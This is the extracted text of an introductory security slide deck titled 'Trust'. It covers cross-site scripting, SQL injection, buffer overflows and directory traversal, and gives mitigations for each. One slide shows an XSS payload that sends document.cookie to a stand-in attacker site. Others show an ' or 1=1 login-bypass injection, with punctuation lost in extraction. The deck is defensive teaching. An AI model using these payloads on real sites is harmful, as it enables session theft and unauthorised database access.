Trust

1
Trust

• Glen Dorton

2
Or I may be paranoid, but they really are out
to get me
3
Agenda

• Introduction
• Technical
• Non-technical
• Questions

4
Attacks

• Cross site scripting
• SQL Injection
• Buffer Overflows
• Others

5
Cross Site Scripting

• What is it and how does it work?
• What can be done with it?
• How to mitigate the risk?

6
Cross Site Scripting

• Script tags are embedded in an HTML request that
  is sent back to the user
• Access information related to the vulnerable site
  cookies, session information
• Mitigation
• Validate and filter all user input
• Disable scripting
• Application firewalls

7
Cross Site Scripting

• Example
• ltscriptgtwindow.open(http//attackersite.com/savec
  ookie.cgi?cookie2bdocument.cookie)lt/scriptgt

8
SQL Injection

• Embed SQL statements in HTTP requests
• Access information in application database
• Mitigation
• Validate and filter all user input
• Parameterized stored procedures

9
SQL Injection

• SQL Query looks like this
• SqlstrSelect from users where user_id
  p_user and password p_pass
• Example in password box type in
• or 11

10
SQL Injection

• Final SQL Query looks like this
• Select from users where user_idusername and
  password or 11
• Returns all rows from users table

11
Buffer Overflows

• Technique writes more data to a buffer than the
  buffer can hold
• Stack vs. Heap overflows
• Mitigation
• Validate and filter user input
• Stack smashing protection - validates stack has
  not been altered on function return
• No Execute Bit

12
Directory Traversal

• Attackers attempt to access folders above the
  folder in which the web application is located in
• Mitigation dont write web applications that
  rely on directory traversal or relative paths

13
Bad Idea

• Online shopping sites that pass the price to the
  browser and then use it to calculate the customer
  cost when they add an item to their cart.
• NEVER trust input from the user

14
Non-technical

• So who do you trust?

15
Non-technical

• TRUST NO ONE

16
Questions?